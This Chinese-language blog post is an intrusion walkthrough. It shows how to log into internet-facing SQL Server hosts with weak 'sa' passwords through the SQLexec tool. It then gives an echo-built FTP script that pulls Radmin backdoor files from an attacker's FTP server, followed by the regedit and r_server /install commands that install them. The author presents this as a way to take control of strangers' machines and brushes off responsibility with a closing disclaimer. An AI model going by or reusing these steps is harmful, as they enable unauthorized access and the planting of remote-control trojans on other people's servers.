SA弱口令結合FTP的入侵實例

作者：栓子　　來自：http://admins.ltxz.net/

閑著無聊，就在網上隨便找了一段，最近一直想利用SQl做點什麼，所以就先從他弱口令開始吧。呵呵！～～
    這樣的機子在網上要多少有多少，掃瞄工具更是舉不勝舉，我在此不做過多的詳述，今天我們是要利用這些漏洞上傳木馬，獲取系統權限才是目的。
    好了，拿出久味開啟的SQlexec數據庫連接工具，複製了一個IP上去，先試試能不能連。呵呵！
    

不錯，我們成功的看到了他C盤下的動動。今天的運氣真的是太好了，高興的。。。。原地走兩圈吧！
我接著鍵入net start命令，服務一切正常，所以想走捷徑是不可能了。不打緊，我們給他下個木裝上不就得了。呵呵，說做就做，先寫一個FTP的腳本吧，這樣方便這雞一下子把所有的東東下完。

 

我做的FTP.txt腳本如下：
     @echo off
     @echo open ftp.targe.com port>ftp.txt
     @echo username>>ftp.txt
     @echo password>>ftp.txt
     @echo get radmin.reg>>ftp.txt
     @echo binary>>ftp.txt
     @echo get admdll.dll>>ftp.txt
     @echo get r_server.exe>>ftp.txt
     @echo bye>>ftp.txt
     @echo on
     ftp.targe.com是你的ftp的地址，username和password是。。。。不用說了吧！
port是端口號。當然，如果你需要看執行結果的話，可以把@echo off和@echo on這兩行取掉，也方便錄入。呵呵～～
     接著在命令行裡面鍵入： ftp -s:ftp.txt一切順利的話，過不了多長時間，都會把這三個文件下下來。
      呵呵，偉大的時間就要到來了！
      當文件下載一切成功之後，我們就可以啟動它了。 命令如下：
     regedit /s radmin.reg
     r_server /install
等等，在SQlexec裡面執行到這的時候往往Sqlexec回死掉，如果死掉的話，那麼我們再接著連接，接著鍵入
     net start
     你會在屏募上看到熟悉的字符，哈哈哈。"successful!"
     我想到了， 這裡就不用我說了吧，如果你進的是一臺Server的機子，那開3389就看個人愛好了。不過如果入侵了一臺WEB的服務器，最好不要亂來哦。不然網管會哭的，我這裡只是介紹方法，一切後果可是與我沒有半點關係的。
      就到這裡吧，寫的太亂了，如果大家有什麼問題可以向我提問！

 

 

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: SA弱口令
相關日誌: